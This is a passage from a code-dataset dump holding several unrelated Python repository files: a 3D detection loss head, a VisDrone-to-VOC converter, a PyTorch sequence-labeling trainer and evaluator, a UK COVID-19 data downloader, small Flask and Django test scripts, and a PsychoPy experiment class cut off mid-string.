zero_vector).transpose(1,2).view(batch, 1, H, W)\n L2_dist_ret_list.append(dist)\n assert len(L2_dist_ret_list) == self.seq_length-1\n\n loss_denominator = [self.num_class * (self.seq_length-1)] * batch\n loss_per_batch_list = [0] * batch\n\n for t in range(self.seq_length-1):\n for idx, heatmap_ref in enumerate(heatmap_ref_dict['heatmaps']):\n for batch_idx in range(batch):\n heatmap_similarity_loss = self.heatmap_similarity_loss_per_single_head(L2_dist_ret_list[t][batch_idx], heatmap_ref[batch_idx])\n if heatmap_similarity_loss == 0:\n loss_denominator[batch_idx] -= heatmap_ref[batch_idx].size()[1]\n continue\n loss_per_batch_list[batch_idx] += heatmap_similarity_loss\n final_loss_per_batch_list = [loss_per_batch_list[batch_idx] / loss_denominator[batch_idx] for batch_idx in range(batch)]\n assert len(final_loss_per_batch_list) == batch\n final_loss = sum(final_loss_per_batch_list) / batch\n\n return final_loss\n\n\n def forward(self, data_dict_seq_list):\n embed_features_2d_list = []\n for t in range(self.seq_length):\n if t == (self.seq_length-1):\n embed_features_2d_list.append(self.embedding_network(data_dict_seq_list[t]['spatial_features_2d']))\n else:\n embed_features_2d_list.append(self.embedding_network(data_dict_seq_list[t]['aligned_features_2d']))\n assert len(embed_features_2d_list) == self.seq_length\n\n target_data_dict = data_dict_seq_list[-1]\n \n \n heatmap_ref_dict = self.assign_targets(\n target_data_dict['gt_boxes'], 
feature_map_size=embed_features_2d_list[-1].size()[2:],\n feature_map_stride=target_data_dict.get('spatial_features_2d_strides', None)\n )\n \n similarity_loss = self.get_loss(embed_features_2d_list, heatmap_ref_dict)\n similarity_loss = similarity_loss * self.model_cfg.AUX_LOSS_WEIGHTS\n return similarity_loss","repo_name":"junhyung-SPALab/D-Align","sub_path":"pcdet/models/dense_heads/aux_loss_head.py","file_name":"aux_loss_head.py","file_ext":"py","file_size_in_byte":10930,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"35301460387","text":"import argparse\n\n\nfrom os import path, listdir, makedirs\n\nfrom annotation import process_annotation\nfrom image import process_image\n\nvisdrone_sets = [('2019', 'DET', 'train'), ('2019', 'DET', 'val'), ('2019', 'DET', 'test-dev')]\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-s', '--src', dest='visdrone_path', help='path to visdrone dataset', required=True)\nparser.add_argument('-d', '--dest', dest='voc_path', help='path to VOC dataset', required=True)\nparser.add_argument('-w', '--width', dest='w', help='new image width', required=True, type=int)\nparser.add_argument('-l', '--height', dest='h', help='new image height', required=True, type=int)\n\nargs = parser.parse_args()\n\ndef visdrone2voc():\n for s in visdrone_sets:\n print(f'[VisDrone/{s[2]}] processing started ...')\n set_name = \"-\".join(s)\n set_anns_path = path.join(args.visdrone_path, f\"VisDrone{set_name}\", \"annotations\")\n set_imgs_path = path.join(args.visdrone_path, f\"VisDrone{set_name}\", \"images\")\n\n ann_list = [path.join(set_anns_path, a) for a in listdir(set_anns_path)]\n img_list = [path.join(set_imgs_path, i) for i in listdir(set_imgs_path)]\n voc_images = path.join(args.voc_path, \"VOC2007\", \"JPEGImages\")\n voc_anns = path.join(args.voc_path, \"VOC2007\", \"Annotations\")\n # make sure destination structure exists\n makedirs(voc_images, exist_ok=True)\n makedirs(voc_anns, exist_ok=True)\n\n for src_ann, src_img in zip(sorted(ann_list), sorted(img_list)):\n img_meta = process_image(src_img, (args.w, args.h, 3), voc_images)\n process_annotation(src_ann, img_meta, voc_anns)\n print(f'done processing {img_meta[\"file\"]}')\n print(f'[VisDrone/{s[2]}] processing done.')\n\nif __name__ == '__main__':\n visdrone2voc()\n","repo_name":"farajist/visdrone2voc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73410667689","text":"from typing import List, Optional, Tuple, Union\nimport os\nimport tempfile\nimport tarfile\nimport json\n\nimport dill\nimport torch\nfrom torch.autograd import Variable\nfrom torch import nn\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom torchcrf import CRF\nfrom torchtext.vocab import Vectors\nfrom sacred.run import Run\n\nfrom seqlab.models import SequenceLabeler\nfrom seqlab.trainer import Trainer\nfrom seqlab.evaluator import Evaluator\n\nfrom helfer.evaluation import evaluate_conll\n\nclass NewSequenceLabeler(SequenceLabeler):\n def __init__(self,\n num_words: int,\n num_tags: int,\n num_chars: int = 0,\n word_embedding_size: int = 300,\n dropout: float = 0,\n var_dropout: float = 0,\n embed_dropout: float = 0,\n use_pretrained_embeddings=False,\n pretrained_emb_dir='',\n update_pretrained_embedding=True,\n encoder_hidden_size: int = 200,\n lm_loss_scale: float = 0.1,\n lm_layer_size: int = 50,\n 
lm_max_vocab_size: int = 7500,\n pre_output_layer_size: int = 50,\n char_integration_method: str = 'none',\n char_embedding_size: int = 50,\n char_encoder_hidden_size: int = 200,\n unk_id: int = 0,\n ) -> None:\n if num_words <= 0:\n raise ValueError(f'invalid number of words: {num_words}')\n if num_tags <= 0:\n raise ValueError(f'invalid number of tags: {num_tags}')\n if word_embedding_size <= 0:\n raise ValueError(\n f'invalid word embedding size: {word_embedding_size}')\n if dropout < 0. or dropout >= 1.:\n raise ValueError(f'invalid dropout rate: {dropout:.2f}')\n if encoder_hidden_size <= 0:\n raise ValueError(\n f'invalid encoder hidden size: {encoder_hidden_size}')\n if lm_layer_size <= 0:\n raise ValueError(\n f'invalid language modeling layer size: {lm_layer_size}')\n if lm_max_vocab_size <= 0:\n raise ValueError(\n f'invalid language modeling max vocabulary size: {lm_max_vocab_size}')\n if char_integration_method not in ('none', 'concatenation', 'attention'):\n raise ValueError(\n f'invalid character integration method: {char_integration_method}')\n if char_embedding_size <= 0:\n raise ValueError(\n f'invalid character embedding size: {char_embedding_size}')\n if char_encoder_hidden_size <= 0:\n raise ValueError(\n f'invalid character encoder hidden size: {char_encoder_hidden_size}')\n\n # These two conditionals ensure that\n # char_integration_method == 'none' <-> not num_chars\n if char_integration_method != 'none' and not num_chars:\n raise ValueError(\n \"'num_chars' must be specified when integration method is not 'none'\")\n if char_integration_method == 'none' and num_chars:\n raise ValueError(\n f\"invalid value for 'num_chars' when integration method is 'none': {num_chars}\")\n assert (char_integration_method != 'none' or not num_chars) and \\\n (char_integration_method == 'none' or num_chars)\n\n self.use_pretrained_embeddings = use_pretrained_embeddings\n\n super(NewSequenceLabeler, self).__init__(num_words=num_words, \n num_tags=num_tags, \n num_chars=num_chars,\n word_embedding_size=word_embedding_size,\n dropout=dropout, \n encoder_hidden_size=encoder_hidden_size,\n lm_loss_scale=lm_loss_scale, lm_layer_size=lm_layer_size,\n lm_max_vocab_size=lm_max_vocab_size, \n pre_output_layer_size=pre_output_layer_size, \n char_integration_method=char_integration_method,\n char_embedding_size=char_embedding_size, \n char_encoder_hidden_size=char_encoder_hidden_size, \n unk_id=unk_id)\n\n # # Attributes\n # self.num_words = num_words\n # self.num_tags = num_tags\n # self.num_chars = num_chars\n # self.word_embedding_size = word_embedding_size\n # self.var_dropout = var_dropout\n # self.embed_dropout = embed_dropout\n # self.dropout = dropout\n # self.encoder_hidden_size = encoder_hidden_size\n # self.lm_loss_scale = lm_loss_scale\n # self.lm_layer_size = lm_layer_size\n # self.lm_max_vocab_size = lm_max_vocab_size\n # self.pre_output_layer_size = pre_output_layer_size\n # self.char_integration_method = char_integration_method\n # self.char_embedding_size = char_embedding_size\n # self.char_encoder_hidden_size = char_encoder_hidden_size\n # self.unk_id = unk_id\n\n # Embeddings\n self.word_embedding = nn.Embedding(num_words, word_embedding_size)\n if use_pretrained_embeddings:\n pretrained_embed_weights = torch.load(\n os.path.join(pretrained_emb_dir, 'pretrained_embed_weights.pt'))\n for i, _ in enumerate(pretrained_embed_weights):\n if len(pretrained_embed_weights[i, :].nonzero()) == 0:\n torch.nn.init.normal(pretrained_embed_weights[i], std=0.1)\n 
self.word_embedding.weight.data.copy_(pretrained_embed_weights)\n if not(update_pretrained_embedding):\n self.word_embedding.requires_grad = False\n\n if self.uses_char_embeddings:\n self.char_embedding = nn.Embedding(num_chars, char_embedding_size)\n\n # # Char encoder LSTM\n # if self.uses_char_embeddings:\n # self.char_encoder = nn.LSTM(\n # char_embedding_size,\n # char_encoder_hidden_size,\n # num_layers=1,\n # batch_first=True,\n # dropout=0.,\n # bidirectional=True,\n # )\n # self.char_projection = nn.Sequential(\n # nn.Linear(2 * char_encoder_hidden_size, word_embedding_size),\n # nn.Tanh(),\n # )\n\n # # Attention\n # if char_integration_method == 'attention':\n # self.attention = nn.Sequential(\n # nn.Linear(2 * word_embedding_size, word_embedding_size),\n # nn.Tanh(),\n # nn.Linear(word_embedding_size, word_embedding_size),\n # nn.Sigmoid(),\n # )\n\n # # Seq2seq encoder\n # if self.dropout:\n # self.dropout_layer = nn.Dropout(dropout)\n # encoder_input_size = word_embedding_size\n # if char_integration_method == 'concatenation':\n # encoder_input_size *= 2\n\n # self.encoder = nn.LSTM(\n # encoder_input_size,\n # encoder_hidden_size,\n # num_layers=1,\n # batch_first=True,\n # dropout=0.,\n # bidirectional=True,\n # )\n\n # # Language modeling\n # if self.uses_lm_loss:\n # lm_output_size = min(num_words, lm_max_vocab_size) + 1\n # self.lm_ff_fwd = nn.Sequential(\n # nn.Linear(encoder_hidden_size, lm_layer_size),\n # nn.Tanh(),\n # nn.Linear(lm_layer_size, lm_output_size),\n # )\n # self.lm_ff_bwd = nn.Sequential(\n # nn.Linear(encoder_hidden_size, lm_layer_size),\n # nn.Tanh(),\n # nn.Linear(lm_layer_size, lm_output_size),\n # )\n\n # # Output layer\n # if self.uses_pre_output_layer:\n # self.pre_output_layer = nn.Sequential(\n # nn.Linear(2 * encoder_hidden_size, pre_output_layer_size),\n # nn.Tanh(),\n # )\n # self.output_layer = nn.Linear(pre_output_layer_size, num_tags)\n # else:\n # self.output_layer = nn.Linear(2 * encoder_hidden_size, num_tags)\n # self.crf = CRF(num_tags)\n\n # self.reset_parameters()\n\n def reset_parameters(self) -> None:\n \"\"\"Initialize all model parameters.\n\n As implemented by Rei et al., all parameters are initialized randomly\n from normal distribution with mean 0 and stddev 0.1.\n \"\"\"\n for name, param in self.named_parameters():\n if not (name == 'word_embedding.weight' and self.use_pretrained_embeddings):\n nn.init.normal(param, std=0.1)\n\n def _compute_emissions_and_loss(self,\n words: Variable,\n chars: Variable,\n mask: Variable,\n ) -> Tuple[Variable, Variable]:\n\n # words: (batch_size, seq_length)\n # chars: (batch_size, seq_length, char_seq_length)\n # mask: (batch_size, seq_length, char_seq_length)\n\n assert words.dim() == 2\n assert chars.dim() == 3\n assert chars.size() == mask.size()\n\n loss = 0.\n\n # (batch_size, seq_length, word_emb_size)\n\n embedded_words = self.word_embedding(words)\n\n if self.uses_char_embeddings:\n # (batch_size, seq_length, word_emb_size)\n encoded_chars = self._compose_char_embeddings(chars, mask)\n if self.char_integration_method == 'concatenation':\n # (batch_size, seq_length, word_emb_size * 2)\n inputs = torch.cat([embedded_words, encoded_chars], dim=-1)\n else: # must be attention\n # Add cosine similarity loss for non-unk words\n loss += self._compute_similarity_loss(\n words, embedded_words, encoded_chars)\n # Compute attention weights\n # (batch_size, seq_length, word_emb_size * 2)\n concatenated = torch.cat(\n [embedded_words, encoded_chars], dim=-1)\n # (batch_size, seq_length, 
word_emb_size)\n z = self.attention(concatenated)\n # (batch_size, seq_length, word_emb_size)\n inputs = embedded_words*z + encoded_chars*(1.-z)\n else:\n # (batch_size, seq_length, word_emb_size)\n inputs = embedded_words\n\n # (batch_size, seq_length, hidden_size * 2)\n if self.dropout:\n encoded, _ = self.encoder(self.dropout_layer(inputs))\n else:\n encoded, _ = self.encoder(inputs)\n\n if self.uses_lm_loss:\n # Add language modeling loss; the loss is summed over batch\n loss += self.lm_loss_scale * self._compute_lm_loss(encoded, words)\n\n if self.uses_pre_output_layer:\n # (batch_size, seq_length, pre_output_layer_size)\n encoded = self.pre_output_layer(encoded)\n # (batch_size, seq_length, num_tags)\n outputs = self.output_layer(encoded)\n # Remove start and end token\n # (batch_size, seq_length - 2, num_tags)\n outputs = outputs[:, 1:-1, :]\n\n return outputs, loss\n\n def forward(self,\n words: Variable,\n chars: Variable,\n tags: Optional[Variable] = None,\n mask: Optional[Variable] = None,\n ) -> Variable:\n \"\"\"Compute the loss of the given batch of sentences and tags.\n\n Arguments\n ---------\n words : :class:`~torch.autograd.Variable`\n Word indices tensor of type ``LongTensor`` and size ``(batch_size, seq_length)``.\n This tensor should include the start and end token indices.\n chars : :class:`~torch.autograd.Variable`\n Character indices tensor of type ``LongTensor`` and size ``(batch_size, seq_length,\n char_seq_length)``. This tensor should include the character indices of the start\n and end token.\n tags : :class:`~torch.autograd.Variable`\n Tag indices tensor of type ``LongTensor`` and size ``(batch_size, seq_length - 2)``.\n This tensor should *not* include the tag for the start and end token.\n mask : :class:`~torch.autograd.Variable`, optional\n Mask tensor of type ``ByteTensor`` and size ``(batch_size, seq_length,\n char_seq_length)`` indicating the valid entries in ``chars``.\n\n Returns\n -------\n :class:`~torch.autograd.Variable`\n A variable of type ``FloatTensor`` and size ``(1,)`` containing the loss, summed\n over batch.\n \"\"\"\n\n self._check_inputs_dimensions_and_sizes(\n words, chars, tags=tags, mask=mask)\n if mask is None:\n mask = Variable(self._new(chars.size()).fill_(1)).byte()\n\n outputs, loss = self._compute_emissions_and_loss(words, chars, mask)\n\n # Transpose batch_size and seq_length for CRF\n # NOTE transposing tensors make them not contiguous, but CRF needs them so\n # (seq_length - 2, batch_size, num_tags)\n outputs = outputs.transpose(0, 1).contiguous()\n tags = tags.transpose(0, 1).contiguous()\n\n if tags is not None:\n # Return loss minus CRF log likelihood\n loss = loss - self.crf(outputs, tags)\n return loss\n\n\nclass TrainerMod(Trainer):\n \"\"\"Trainer for sequence labeler model.\n\n This class serves as a trainer for the sequence labeler model. At the heart of this class\n is its entrypoint, the ``run`` method, which implements a `template method pattern`_. The\n method executes several steps during training where individual step is implemented as\n a method. Thus, customizing the training algorithm can be done by simply inheriting from\n this class and overriding the desired methods.\n\n Arguments\n ---------\n train_corpus : str\n Path to the training corpus in two-column CoNLL format.\n save_to : str\n Path to a directory to save training artifacts.\n dev_corpus : str, optional\n Path to the development corpus in two-column CoNLL format.\n encoding : str\n File encoding to use. 
(default: utf-8)\n min_freq : int\n Minimum frequency of a word to be included in the vocabulary. (default: 2)\n word_embedding_size : int\n Size of word embeddings. (default: 300)\n dropout : float\n The dropout rate. (default: 0.5)\n encoder_hidden_size : int\n Size of the LSTM encoder hidden layer. (default: 200)\n lm_loss_scale : float\n Scaling coefficient for the language modeling loss. If set to a nonpositive scalar,\n language modeling loss is not computed. (default: 0.1)\n lm_layer_size : int\n Hidden layer size for language modeling. (default: 50)\n lm_max_vocab_size : int\n Maximum vocabulary size for language modeling. (default: 7500)\n pre_output_layer_size : int\n Size of pre-output layer. If set to a nonpositive number, no pre-output layer is\n used. (default: 50)\n char_integration_method : str\n How to integrate character embeddings. Possible values are 'none', 'concatenation',\n and 'attention'. If ``num_chars`` is 0 then this must be 'none', and vice versa.\n (default: 'none')\n char_embedding_size : int\n Size of character embeddings. (default: 50)\n char_encoder_hidden_size : int\n Size of the LSTM character encoder hidden layer. (default: 200)\n learning_rate : float\n The learning rate. (default: 0.001)\n optimizer : str\n Name of optimizer to use. Can be 'adam' or 'sgd'. (default: adam)\n num_epochs : int\n Number of epochs to train. (default: 10)\n batch_size : int\n Number of samples in one batch. (default: 16)\n device : int\n GPU device to use. Set to -1 for CPU. (default: -1)\n log_interval : int\n Print log every this number of updates. (default: 10)\n seed : int\n Random seed. (default: 201)\n logger : `~logging.Logger`, optional\n Logger object to use for logging.\n\n .. _template method pattern: https://en.wikipedia.org/wiki/Template_method_pattern\n \"\"\"\n def __init__(self, _run : Run,\n train_corpus: str,\n save_to: str,\n dev_corpus: str,\n num_epochs: int,\n char_integration_method: str,\n word_embedding_size: int = 300,\n lm_loss_scale: float = 0.1,\n dropout: float = 0.,\n pretrained_embeddings: str = None,\n update_pretrained_embedding: bool = True,\n learning_rate: float = 0.001,\n decay: bool = False,\n device: int = -1,\n decay_patience: int = 10,\n stop_patience: int = 3,\n early_stopping: bool = True,\n save: bool = False,\n model_class = SequenceLabeler) -> None:\n torch.backends.cudnn.enabled = False\n\n self.sacred_run = _run # instance of the experiment's sacred run object\n self.stop_patience = stop_patience\n self.decay_patience =decay_patience\n self.decay = decay\n self.best_loss = 1e15\n self.early_stopping = early_stopping\n self.dev_corpus = dev_corpus\n self.save = save\n self.pretrained_embeddings = pretrained_embeddings\n self.update_pretrained_embedding = update_pretrained_embedding\n self.model_class = model_class\n super(TrainerMod, self).__init__(train_corpus,\n save_to,\n self.dev_corpus,\n word_embedding_size=word_embedding_size,\n num_epochs=num_epochs,\n dropout=dropout,\n lm_loss_scale=lm_loss_scale,\n char_integration_method=char_integration_method,\n learning_rate=learning_rate,\n device=device)\n\n def on_start(self, state: dict) -> None:\n if state['train']:\n self.logger.info('Start training')\n self.train_timer.reset()\n # decaying learning rate\n if(self.decay):\n self.scheduler = ReduceLROnPlateau(\n self.optimizer, \n patience=self.decay_patience, \n factor=0.5)\n else:\n self.reset_meters()\n self.model.eval()\n\n def on_end_epoch(self, state: dict) -> None:\n elapsed_time = self.epoch_timer.value()\n assert 
len(self.references) == len(self.train_dataset)\n overall, by_type = self.get_conll_evaluation()\n self.logger.info(\n 'Epoch %d done (%.4fs): %.4f samples/s | loss %.4f | F1 %.4f',\n state['epoch'], elapsed_time, self.speed_meter.value()[0],\n self.loss_meter.value()[0], overall.f1_score)\n\n self.sacred_run.log_scalar(\n 'train_loss', self.loss_meter.value()[0], state['epoch'])\n self.sacred_run.log_scalar(\n 'train_f1', overall.f1_score, state['epoch'])\n\n if(self.decay):\n self.scheduler.step(self.loss_meter.value()[0]) # lr decay scheduler\n\n self.logger.info(self.format_per_tag_f1_score(by_type))\n self.save_model()\n\n if self.dev_iterator is not None:\n self.logger.info('Evaluating on dev set')\n self.engine.test(self.network, self.dev_iterator)\n assert len(self.references) == len(self.dev_iterator.dataset)\n overall, by_type = self.get_conll_evaluation()\n self.logger.info(\n 'Result on dev set: %.4f samples/s | loss %.4f | F1 %.4f',\n self.speed_meter.value()[0], self.loss_meter.value()[0],\n overall.f1_score)\n self.sacred_run.log_scalar(\n 'dev_loss', self.loss_meter.value()[0], state['epoch'])\n self.sacred_run.log_scalar(\n 'dev_f1', overall.f1_score, state['epoch'])\n self.current_loss = self.loss_meter.value()[0]\n if(self.early_stopping):\n if self.current_loss < self.best_loss:\n self.best_loss = self.current_loss\n self.wait = 0\n else:\n self.wait += 1\n if self.wait >= self.stop_patience:\n self.logger.info(\n f\"Early stop triggered after {state['epoch']} epoch(s)\")\n # terminating condition for train-loop in tnt\n state['maxepoch'] = state['epoch']\n for i, key in enumerate(sorted(by_type.keys())):\n score = by_type[key].f1_score\n score = f'{score:.4f}'\n self.sacred_run.log_scalar(key + \"_f1\", score, state['epoch'])\n\n self.logger.info(self.format_per_tag_f1_score(by_type))\n\n def save_artifacts(self) -> None:\n if self.save:\n super().save_artifacts()\n else:\n pass\n\n def build_model(self) -> None:\n model_args = (self.num_words, self.num_tags)\n print(model_args)\n num_chars = 0 if self.char_integration_method == 'none' else self.num_chars\n model_kwargs = dict(\n num_chars=num_chars,\n word_embedding_size=self.word_embedding_size,\n dropout=self.dropout,\n encoder_hidden_size=self.encoder_hidden_size,\n lm_loss_scale=self.lm_loss_scale,\n lm_layer_size=self.lm_layer_size,\n lm_max_vocab_size=self.lm_max_vocab_size,\n pre_output_layer_size=self.pre_output_layer_size,\n char_integration_method=self.char_integration_method,\n char_embedding_size=self.char_embedding_size,\n char_encoder_hidden_size=self.char_encoder_hidden_size,\n unk_id=self.WORDS.vocab.stoi[self.WORDS.unk_token]\n )\n\n if self.model_class == NewSequenceLabeler:\n use_pretrained_embeddings = True if self.pretrained_embeddings else False\n model_kwargs['use_pretrained_embeddings'] = use_pretrained_embeddings\n model_kwargs['update_pretrained_embedding'] = self.update_pretrained_embedding\n model_kwargs['pretrained_emb_dir'] = self.save_to\n\n self.model = self.model_class(*model_args, **model_kwargs)\n if self.device >= 0:\n self.model.cuda(self.device)\n self.logger.info('Saving model metadata to %s',\n self.model_metadata_path)\n with open(self.model_metadata_path, 'w') as f:\n json.dump({'args': model_args, 'kwargs': model_kwargs},\n f, indent=2, sort_keys=True)\n self.save_model()\n\n # modified for pretrained embedding\n def build_vocabularies(self) -> None:\n self.logger.info('Building vocabularies')\n if self.pretrained_embeddings is not None:\n vectors = 
Vectors(self.pretrained_embeddings)\n self.WORDS.build_vocab(\n self.train_dataset, min_freq=self.min_freq, vectors=vectors)\n vecfile = os.path.join(self.save_to, 'pretrained_embed_weights.pt')\n torch.save(self.WORDS.vocab.vectors, vecfile)\n else:\n self.WORDS.build_vocab(self.train_dataset, min_freq=self.min_freq)\n self.CHARS.build_vocab(self.train_dataset)\n self.TAGS.build_vocab(self.train_dataset)\n\n self.num_words = len(self.WORDS.vocab)\n self.num_chars = len(self.CHARS.vocab)\n self.num_tags = len(self.TAGS.vocab)\n self.logger.info(\n 'Found %d words, %d chars, and %d tags',\n self.num_words, self.num_chars, self.num_tags)\n\n self.logger.info('Saving fields to %s', self.fields_path)\n torch.save(self.fields, self.fields_path, pickle_module=dill)\n\n def run(self) -> None:\n self.set_random_seed()\n self.prepare_for_serialization()\n self.init_fields()\n self.process_corpora()\n self.build_vocabularies()\n self.build_model()\n self.build_optimizer()\n\n self.engine.hooks['on_start'] = self.on_start\n self.engine.hooks['on_start_epoch'] = self.on_start_epoch\n self.engine.hooks['on_sample'] = self.on_sample\n self.engine.hooks['on_forward'] = self.on_forward\n self.engine.hooks['on_end_epoch'] = self.on_end_epoch\n self.engine.hooks['on_end'] = self.on_end\n\n try:\n self.engine.train(\n self.network, self.train_iterator, self.num_epochs, self.optimizer)\n except KeyboardInterrupt:\n self.logger.info('Training interrupted, aborting')\n self.save_artifacts()\n\nclass EvaluatorMod(Evaluator):\n def __init__(self, _run, model, artifacts_path: str, corpus_path: str, device=-1\n ) -> None:\n self.sacred_run = _run # instance of the experiment's sacred run object\n self.artifacts_path = artifacts_path\n self.corpus_path = corpus_path\n self.model = model\n super().__init__(artifacts_path, corpus_path, device=device)\n\n def report_evaluation(self) -> None:\n self.logger.info('Evaluating hypotheses against references')\n evaluable = [zip(*sent_pair)\n for sent_pair in zip(self.references, self.hypotheses)]\n overall, by_type = evaluate_conll(evaluable)\n self.sacred_run.info['overall_precision'] = overall.precision\n self.sacred_run.info['overall_recall'] = overall.recall\n self.sacred_run.info['overall_f1'] = overall.f1_score\n # for key in sorted(by_type.keys()):\n # score = by_type[key].f1_score\n # self.sacred_run.info[key] = score\n for _, key in enumerate(sorted(by_type.keys())):\n for metric_key in by_type[key]._fields:\n metric_val = getattr(by_type[key], metric_key)\n self.sacred_run.info[f'{key}-{metric_key}'] = metric_val\n self.sacred_run.log_scalar(f'{key}-{metric_key}', metric_val)\n\n def load_artifacts(self, model) -> None:\n if self.artifacts_loaded:\n return\n\n self.logger.info('Loading artifacts from %s', self.artifacts_path)\n artifact_names = [\n TrainerMod.FIELDS_FILENAME,\n TrainerMod.MODEL_METADATA_FILENAME,\n TrainerMod.MODEL_PARAMS_FILENAME,\n ]\n with tempfile.TemporaryDirectory() as tmpdirname:\n self.logger.info('Extracting artifacts to %s', tmpdirname)\n with tarfile.open(self.artifacts_path, 'r:gz') as f:\n members = [member for member in f.getmembers()\n if member.name in artifact_names]\n f.extractall(tmpdirname, members=members)\n\n self.logger.info('Loading fields')\n self.fields = torch.load(\n os.path.join(tmpdirname, TrainerMod.FIELDS_FILENAME), pickle_module=dill)\n fields_dict = dict(self.fields)\n self.WORDS = fields_dict[TrainerMod.WORDS_FIELD_NAME]\n self.CHARS = fields_dict[TrainerMod.CHARS_FIELD_NAME]\n self.TAGS = 
fields_dict[TrainerMod.TAGS_FIELD_NAME]\n\n            self.logger.info('Loading model metadata')\n            with open(os.path.join(tmpdirname, TrainerMod.MODEL_METADATA_FILENAME)) as fm:\n                self.model_metadata = json.load(fm)\n\n            self.logger.info('Building model and restoring model parameters')\n            self.model = model(\n                *self.model_metadata['args'], **self.model_metadata['kwargs'])\n            # Load to CPU, \n            # see https://discuss.pytorch.org/t/on-a-cpu-device-how-to-load-checkpoint-saved-on-gpu-device/349/4 \n            # noqa\n            self.model.load_state_dict(\n                torch.load(os.path.join(tmpdirname, TrainerMod.MODEL_PARAMS_FILENAME),\n                           map_location=lambda storage, loc: storage))\n            if self.device >= 0:\n                self.model.cuda(self.device)\n            self.artifacts_loaded = True\n\n    def run(self) -> None:\n        self.load_artifacts(self.model)\n        self.load_corpus()\n        self.compute_references_and_hypotheses()\n        self.report_evaluation()\n","repo_name":"kata-ai/wikiner","sub_path":"ingredients/seqlab_mod.py","file_name":"seqlab_mod.py","file_ext":"py","file_size_in_byte":28850,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1522339573","text":"import requests\nfrom pathlib import Path\nfrom util import retrieveFileLinkWls\n\nfileLinks = {\n    \"eng\": \"https://coronavirus.data.gov.uk/downloads/csv/coronavirus-cases_latest.csv\",\n    \"wls\": retrieveFileLinkWls(),\n    # 'sct': 'https://raw.githubusercontent.com/tomwhite/covid-19-uk-data/master/data/covid-19-cases-uk.csv',\n    \"sct\": \"https://www.gov.scot/binaries/content/documents/govscot/publications/statistics/2020/04/coronavirus-covid-19-trends-in-daily-data/documents/covid-19-data-by-nhs-board/covid-19-data-by-nhs-board/govscot%3Adocument/COVID-19%2Bdata%2Bby%2BNHS%2BBoard%2B110520.xlsx\",\n    \"nir\": \"https://api.coronavirus-staging.data.gov.uk/v1/data?filters=areaType=nation;areaName=Northern%2520Ireland&structure=%7B%22areaType%22:%22areaType%22,%22areaName%22:%22areaName%22,%22areaCode%22:%22areaCode%22,%22date%22:%22date%22,%22newCasesByPublishDate%22:%22newCasesByPublishDate%22,%22cumCasesByPublishDate%22:%22cumCasesByPublishDate%22%7D&format=csv\",\n}\n\n\ndef downloadFile(fileLink, fileDir, filename):\n    response = requests.get(fileLink, stream=True)\n    fileExtension = fileLink.split(\".\")[-1]\n    if fileExtension not in (\"csv\", \"xlsx\"):\n        fileExtension = \"csv\"\n    filePath = Path(fileDir, \".\".join([filename, fileExtension]))\n    with open(filePath, \"wb\") as f:\n        for chunk in response.iter_content(1024):\n            f.write(chunk)\n\n\ndef retrieveData(country):\n    country = country.lower()\n    fileLink = fileLinks[country]\n    fileDir = \"data/csv/src\"\n    filename = \"data_latest_\" + country\n    downloadFile(fileLink, fileDir, filename)\n","repo_name":"airallergy/covid-19-choropleth-map-uk","sub_path":"scripts/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15957751134","text":"'''A test file with code for filling the created DB with data,\nand in general for all sorts of experiments with code. Not used in the project.'''\n#import app\nfrom app import app, db, Ingredients, Recipe\n'''Suppose there are a few rows from the DB. 
We'll turn them into a list of lists,\nso we can then pass it to the javascript on the html page'''\nwith app.app_context():\n    id=1\n    ingredients = Recipe.query.get(id).ingredients.all()\n    print(len(ingredients))\n\n    a=[[ingredients[i].ingredient, ingredients[i].weight, ingredients[i].calories, ingredients[i].proteins] for i in range(len(ingredients))]\n    #print(a)\n    sum=0\n    for j in range(len(a)):\n        sum += a[j][2]\n    print(sum)\n'''\nwith app.app_context():\n\n    \n    # Create new line in the db\n    r3=Recipy(title='Poridge', author='Serge',\n        ingredients='rolled oats 100 g, \\n cherry juice 20 g,\\n raisins 20 g', \n        instructions='Mix it and wait for 2 hours')\n    db.session.add(r3)\n    db.session.commit()\n    \n    # change an existing line in the db\n    a=Recipy.query.get(4)\n    a.instructions='Mix it and wait for 4 hours'\n    db.session.commit()\n    '''\n","repo_name":"SergeyGurbich/Cookbook","sub_path":"fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17089721966","text":"from django.test import LiveServerTestCase\nfrom selenium.webdriver.chrome.webdriver import WebDriver\n\n\nclass HomeTests(LiveServerTestCase):\n    def test_selenium(self):\n        selenium = WebDriver()\n        try:\n            for i in range(5):\n                print('Requesting {}'.format(i))\n                selenium.get('{}/{}'.format(self.live_server_url, i))\n        finally:\n            selenium.quit()\n","repo_name":"joshuablake/selenium","sub_path":"home/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21771233831","text":"import time\r\nfrom typing import Text\r\nimport numpy as np\r\nfrom StimulationProcess.BasicStimulationProcess import BasicStimulationProcess\r\nfrom psychopy import event, visual\r\n\r\n\r\nclass IdleProcess(BasicStimulationProcess):\r\n    def __init__(self) -> None:\r\n        super().__init__()\r\n\r\n    def change(self):\r\n\r\n        self.controller.currentProcess = self.controller.prepareProcess\r\n\r\n    def run(self):\r\n        # end-of-block screen for this session\r\n        self._idleInterface()\r\n        # wait for a key press to continue\r\n        # event.waitKeys(keyList=['space'])\r\n\r\n        # update the current block's info\r\n        self.update()\r\n        # self.eventController.clearEvent()\r\n\r\n        time.sleep(3)\r\n\r\n\r\n    def _idleInterface(self):\r\n        \r\n        self.w.flip()\r\n        if self.controller.currentBlockINX == 0:\r\n            text = '实验即将开始,请保持平静,按空格键继续'\r\n        else:\r\n            text = '第%s节实验已经结束\\n\\n\\n 